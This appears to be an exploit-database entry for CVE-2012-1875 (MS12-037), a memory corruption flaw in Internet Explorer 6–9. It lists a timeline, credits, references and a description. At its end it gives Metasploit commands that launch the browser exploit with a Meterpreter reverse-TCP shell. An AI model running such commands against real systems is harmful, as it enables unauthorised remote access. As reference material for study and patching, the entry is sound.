Timeline :
Vulnerability found exploited in the wild
Public release of the vulnerability the 2012-06-12
Metasploit PoC provided the 2012-06-13
PoC provided by :
Dark Son
Qihoo 360 Security Center
Yichong Lin
Google Inc.
juan vazquez
Reference(s) :
MS12-037
CVE-2012-1875
OSVDB-82865
https://twitter.com/binjo/status/212795802974830592
Affected version(s) :
Internet Explorer 6
Internet Explorer 7
Internet Explorer 8
Internet Explorer 9
Tested on Windows XP Pro SP3 with :
Internet Explorer 8 (8.0.6001.18702) and msvcrt ROP
Description :
This module exploits a memory corruption flaw in Internet Explorer 8 when handling objects with the same ID property. At the moment this module targets IE8 over Windows XP SP3 through the heap massaging plus heap spray as exploited in the wild.
Commands :
use exploit/windows/browser/ms12_037_same_id set SRVHOST 192.168.178.100 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.100 exploit sysinfo getuid